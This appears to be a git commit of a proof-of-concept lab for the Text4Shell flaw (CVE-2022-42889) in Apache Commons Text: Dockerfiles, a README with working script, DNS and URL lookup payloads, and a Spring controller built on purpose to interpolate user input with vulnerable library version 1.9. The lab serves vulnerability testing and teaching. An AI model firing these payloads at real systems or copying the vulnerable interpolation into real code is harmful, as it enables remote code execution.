initial commit

Author: cxzero

Dockerfile

@@ -0,0 +1,14 @@
+FROM openjdk:11-jdk-slim
+
+RUN apt update && apt install maven python netcat wget curl -y
+
+WORKDIR /opt/text4shell-poc
+
+# Compile
+COPY pom.xml ./
+COPY src/ ./src/
+
+RUN mvn clean package -DskipTests
+
+EXPOSE 8080
+CMD ["java", "-jar", "target/spring-boot-0.0.1-SNAPSHOT.jar"]

Dockerfile.Java11

@@ -0,0 +1,12 @@
+FROM openjdk:11-jdk-slim
+
+RUN apt update && apt install maven python netcat wget curl -y
+
+WORKDIR /opt/text4shell-poc
+
+RUN mkdir target
+
+COPY target/spring-boot-0.0.1-SNAPSHOT.jar target/
+
+EXPOSE 8080
+CMD ["java", "-jar", "target/spring-boot-0.0.1-SNAPSHOT.jar"]

Dockerfile.Java19

@@ -0,0 +1,12 @@
+FROM openjdk:19-jdk-slim
+
+RUN apt update && apt install maven python netcat wget curl -y
+
+WORKDIR /opt/text4shell-poc
+
+RUN mkdir target
+
+COPY target/spring-boot-0.0.1-SNAPSHOT.jar target/
+
+EXPOSE 8080
+CMD ["java", "-jar", "target/spring-boot-0.0.1-SNAPSHOT.jar"]

README.md

@@ -0,0 +1,112 @@
+# CVE-2022-42889 aka text4shell
+
+PoC for recently discovered vulnerability in Apache Commons Text by @pwntester (https://github.com/pwntester): https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/
+
+As mentioned in https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/:
+>The vulnerability exists in the StringSubstitutor interpolator object. An interpolator is created by the StringSubstitutor.createInterpolator() method and will allow for string lookups as defined in the StringLookupFactory. This can be used by passing a string “${prefix:name}” where the prefix is the aforementioned lookup. Using the “script”, “dns”, or “url” lookups would allow a crafted string to execute arbitrary scripts when passed to the interpolator object.
+
+# Affected versions
+The affected Apache Commons Text versions are 1.5 through 1.9.
+It has been patched in version 1.10.
+
+# Conditions to be exploited
+- Run a version of Apache Commons Text from version 1.5 to 1.9
+- Use the StringSubstitutor interpolator class (https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html)
+
+To be remotely exploited, attacker controlled input must be used as input for the StringSubstitutor interpolation. In particular, in StringSubstitutor.replace() or StringSubstitutor.replaceIn() methods
+
+# Other javascript script engines
+Since JDK 15 the Nashorn JavaScript Engine was removed: https://openjdk.org/jeps/372. 
+But if third parties dependencies are included such as JEXL, RCE in Apache Commnos Text could happen (https://twitter.com/pwntester/status/1582321752566161409)
+
+# Exploitation
+## script interpolator
+It can be exploited to gain RCE.
+
+### JDK < 15
+```
+{java:version} ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
+```
+### JDK 15+ 
+If using third party JEXL:
+```
+{java:version} ${script:JEXL:''.getClass().forName('java.lang.Runtime').getRuntime().exec('touch /tmp/pwned')}
+```
+
+## dns interpolator
+It can lead to a DNS lookup:
+
+```
+${dns:address|commons.apache.org}
+```
+
+## url interpolator
+It connects to the specified URL and tries to fetch the content:
+
+```
+${url:UTF-8:https://nvd.nist.gov/vuln/detail/CVE-2022-42889
+```
+
+Template based on https://start.spring.io/
+
+# Manual compilation of PoC
+```
+mvn clean package -DskipTests
+java -jar spring-boot-0.0.1-SNAPSHOT.jar 
+```
+
+# Running app in Docker 
+
+## Using JVM 11
+```
+sudo docker build -t text4shell . -f Dockerfile.Java11
+sudo docker run -p 8080:8080 text4shell 
+```
+
+## Using JVM 19
+```
+sudo docker build -t text4shell . -f Dockerfile.Java19
+sudo docker run -p 8080:8080 text4shell 
+```
+
+# Provided POCs
+
+There are different endpoints provided to test for the different attack vectors mentioned.
+
+## /poc1
+```
+curl http://localhost:8080/poc1
+```
+
+## /poc2
+```
+curl http://localhost:8080/poc2
+```
+
+## /poc3
+```
+curl http://localhost:8080/poc3
+```
+
+## /message?text=
+```
+curl http://localhost:8080/message
+curl http://localhost:8080/message?text=1
+curl http://localhost:8080/message?text=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27touch%20%2Ftmp%2Ffoo%27)%7D
+```
+
+# References
+https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/
+https://sysdig.com/blog/cve-2022-42889-text4shell/
+https://nakedsecurity.sophos.com/2022/10/18/dangerous-hole-in-apache-commons-text-like-log4shell-all-over-again/
+https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
+https://www.cyberkendra.com/2022/10/apache-commons-text-code-execution.html
+https://twitter.com/pwntester/status/1583189642471706624
+https://twitter.com/pyn3rd/status/1582729285005037568
+
+# Credits to other PoCs
+https://github.com/SeanWrightSec/CVE-2022-42889-PoC/
+https://github.com/korteke/CVE-2022-42889-POC
+https://github.com/karthikuj/cve-2022-42889-text4shell-docker
+https://github.com/ClickCyber/cve-2022-42889/blob/main/CVE-2022-42889.php
+https://github.com/kljunowsky/CVE-2022-42889-text4shell

pom.xml

@@ -0,0 +1,55 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>2.7.5</version>
+        <relativePath/> <!-- lookup parent from repository -->
+    </parent>
+    <groupId>com.example</groupId>
+    <artifactId>spring-boot</artifactId>
+    <version>0.0.1-SNAPSHOT</version>
+    <name>spring-boot</name>
+    <description>Demo project for Spring Boot</description>
+    <properties>
+        <java.version>11</java.version>
+    </properties>
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+
+        <!-- Apache Commons Text dependency version vulnerable to Text4Shell (CVE-2022-42889) -->
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-text</artifactId>
+            <version>1.9</version>
+        </dependency>
+
+        <!-- Added to test for JEXL scripting in JDK > 15 -->
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-jexl3</artifactId>
+            <version>3.2.1</version>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.springframework.boot</groupId>
+                <artifactId>spring-boot-maven-plugin</artifactId>
+            </plugin>
+        </plugins>
+    </build>
+
+</project>

src/main/java/com/example/springboot/Application.java

@@ -0,0 +1,11 @@
+package com.example.springboot;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Application {
+    public static void main(String[] args) {
+        SpringApplication.run(Application.class, args);
+    }
+}

src/main/java/com/example/springboot/TextController.java

@@ -0,0 +1,53 @@
+package com.example.springboot;
+
+import org.apache.commons.text.StringSubstitutor;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class TextController {
+    @GetMapping("/poc1")
+    public String pocScript() {
+        String script;
+        if (getRunningJVMVersion() < 15) {
+            script = "${java:version} - ${script:javascript:7*7} - ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}";
+        } else {
+            script = "${java:version} - ${script:javascript:7*7} - ${script:JEXL:''.getClass().forName('java.lang.Runtime').getRuntime().exec('touch /tmp/pwned')}";
+        }
+        return interpolate(script);
+    }
+
+    @GetMapping("/poc2")
+    public String pocDNS() {
+        String dns = "${java:version} - ${dns:address|commons.apache.org}";
+        return interpolate(dns);
+    }
+
+    @GetMapping("/poc3")
+    public String pocURL() {
+        String dns = "${java:version} - ${url:UTF-8:https://nvd.nist.gov/vuln/detail/CVE-2022-42889}";
+        return interpolate(dns);
+    }
+
+    @GetMapping("/message")
+    public String handleScript(@RequestParam(defaultValue = "You are running java.version ${java.version} and os.name = ${os.name}") String text) {
+        return interpolate(text);
+    }
+
+    private int getRunningJVMVersion() {
+        System.out.println("Current JVM version - " + System.getProperty("java.version"));
+
+        String[] versionElements = System.getProperty("java.version").split("\\.");
+        int discard = Integer.parseInt(versionElements[0]);
+        int version = (discard == 1) ? Integer.parseInt(versionElements[1]) : discard;
+        return version;
+    }
+
+    private String interpolate(String input) {
+        final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
+        String out = interpolator.replace(input);
+        System.out.println(out);
+        return out;
+    }
+}

src/main/resources/application.properties

@@ -0,0 +1 @@
+

src/test/java/com/example/springboot/ApplicationTests.java

@@ -0,0 +1,13 @@
+package com.example.springboot;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class ApplicationTests {
+
+	@Test
+	void contextLoads() {
+	}
+
+}